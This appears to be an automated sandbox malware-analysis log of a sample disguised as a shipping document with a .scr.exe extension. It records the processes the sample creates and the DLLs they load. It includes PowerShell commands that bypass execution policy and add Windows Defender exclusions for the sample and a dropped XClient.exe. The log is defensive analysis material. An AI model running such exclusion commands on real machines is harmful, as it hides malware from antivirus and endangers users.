Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe"
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
